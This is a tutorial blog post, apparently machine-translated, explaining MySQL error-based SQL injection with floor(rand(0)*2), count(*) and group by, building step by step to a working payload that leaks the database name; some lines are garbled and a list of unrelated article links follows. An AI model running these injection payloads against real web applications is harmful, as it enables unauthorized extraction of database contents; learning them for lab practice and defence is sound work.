Is an error that occurs when these three functions are used together in a particular situation.
First look at the classic FLOOR injection statement:
and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
At first glance, it may seem overwhelming, but let’s start with the basics and analyze the statement at the end
The first is the condition under which the floor() error is generated:
Select count(*),floor(rand(0)*2)x from secure.users group by x select count(*),floor(rand(0)*2)x from secure.users group by x
Floor (RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2)x = floor(RAND (0)*2
Let group by meet floor(rand(0)*2) (if you’ll excuse me),
The specific principle will not be analyzed here, and a few principle explanation links will be attached at the end.
First look at the direct execution effect:

The Duplocate Entry error here is exactly what we want. The error location is on the floor(RAND (0)*2), and the 1 is determined by the error principle. After all, we haven’t written any of the subqueries we want.
Next we add the desired subquery to the error location, concatenating it with concat() :
select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x
Security is the database name we want, 1 is the concatenation from the previous step.
But is it possible to use it directly now?Let’s see what happens when we concatenate it directly into and:
select * from security.users where id=1 and (select count(*) ,concat(database(),floor(rand(0)*2)x) from security.users group by x)
To a fault, baidu found a cause for this error a lot, I am here think we build the result of a select statement is a result table, while the and need a Boolean value, that is, the value of the zero or non-zero, that we are in a nested query, said the result is a result of the select in front of the table, that we can again from this table to execute queries, but this time the select this value is zero number:
select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a
Again, this last “a” does exactly the same thing as the “x” we explained earlier, which is an alias for the parentheses,
SQL statements require that an alias name be given when a query is executed based on the result of the query.
Execute after nested into AND
select * from security.users where id=1 and(select 1 from (select count(*) ,concat(database(),floor(rand(0)*2))x from security.users group by x)a)
You’re done
We have completed the floo() injection statement we introduced at the beginning
Several fool() principles explained:
https://www.cnblogs.com/xdans/p/5412468.html
https://www.cnblogs.com/litlife/p/8472323.html
http://www.cnblogs.com/xishaonian/p/6227405.html
Referral to indicate source
Sync to my blog: http://119.23.249.120/archives/276
Read More:
- Ctfhub error injection
- 12-web security — error injection based on SQL Server — and, convert, cast
- Error Code: 1055. Expression #2 of SELECT list is not in GROUP BY clause and contains nonaggregated
- About MySQL error: subquery returns more than 1 row
- SQL Union, union all usage and common errors and Solutions
- mysql error 1093
- Type definition error – one of the causes of type definition errors is WM in Oracle_ Concat function usage
- WebView loadrequest request request error “nsurlconnection finished with error – Code – 1022”
- Fatal error: Call to a member function bind_param() on a non-object in
- mysql ERROR 1050 (42S01): Table already exists
- Prompt SQL server error 15023 solution memo when modifying user mapping
- How to view the version of MySQL database
- SQL-DataCamp-Analyzing Business Data in SQL
- Linux (error 1819 (HY000): your password does not satisfy the current policy requirements)
- 【Oracle】IMP-00010: not a valid export file, header failed verification
- Error = [Microsoft][SQL Server Native Client 11.0]Unable to open BCP host data-file
- Completely solve Mechanism level: Failed to find any Kerberos tgt
- Summary of database
- Record of problems encountered in using vs2017
- [MySQL] the solution of MySQL workbench “error code: 1175”